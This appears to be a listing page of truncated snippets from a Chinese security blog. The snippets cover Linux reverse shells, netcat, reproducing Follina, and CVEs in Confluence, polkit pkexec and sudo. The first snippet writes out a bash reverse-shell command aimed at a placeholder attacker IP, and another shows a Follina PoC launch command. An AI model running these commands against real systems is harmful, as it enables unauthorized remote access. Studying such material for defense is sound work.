一、Bash介绍     Shell也称为终端或壳，是人与内核之间的翻译官，而Bash则是Linux中默认使用的ShellBash 反弹Shell的命令如下：bash -i >&/dev/tcp/攻击机_IP/攻击机端...

0x01 简介当linux系统上有多个单独网卡，又想充分利用这些网卡，同时对外提供一个统一的网络地址，以使得增大网络的吞吐量，同时也提高网络的可用性，这时就需要bond来帮助我们解决这个问题。Li...

Xray 是一款功能强大的安全评估工具,主要特性有:检测速度快。发包速度快; 漏洞检测算法高效。支持范围广。大至 OWASP Top 10 通用漏洞检测，小至各种 CMS 框架 POC，均可以支持。代码质量高。编...

免责声明：本公众号所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的；不得将上述内容用于商业或者非法用途，否则，一切后果请用户自负。所有的软件来源于互...

0X00 基本概述漏洞概述漏洞名称Atlassian Confluence 路径遍历漏洞漏洞编号QVD-2024-10147,CVE-2024-21677公开时间2024-03-19影响量级百万级奇安信评级高危CVSS 3.1分数8.3威胁类型信息泄露利用...

前言polkit （原名PolicyKit）的 pkexec 中存在本地特权提升漏洞，该SUID-root程序默认安装在每个主要的Linux发行版上。该漏洞允许任何非特权用户通过在Linux默认配置中利用此漏洞来获得易受攻...

1.FreeRadius软件简介FreeRADIUS 是世界上使用最广泛的 RADIUS 服务器。它为全球大多数主要的互联网服务提供商和电信公司提供支持，并且是国际 Wi-Fi 教育漫游服务 eduroam 的关键技术之一。所...

netcat 介绍Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作。常用参数如下：参数描述-c指定连接后要执行的shel...

漏洞复现本地测试环境：Windows 10Microsoft Office 2019项目地址：https://github.com/chvancooten/follina.py运行验证脚本：运行POC同时启动 Web 服务器：python3 follina.py -m binary -b \w...

0x00漏洞简述Sudo是一个功能强大的工具，其允许普通用户执行root权限命令，大多数基于Unix和Linux的操作系统都包含sudo。2021年01月26日，sudo被披露存在一个基于堆的缓冲区溢出漏洞（CVE-2021-...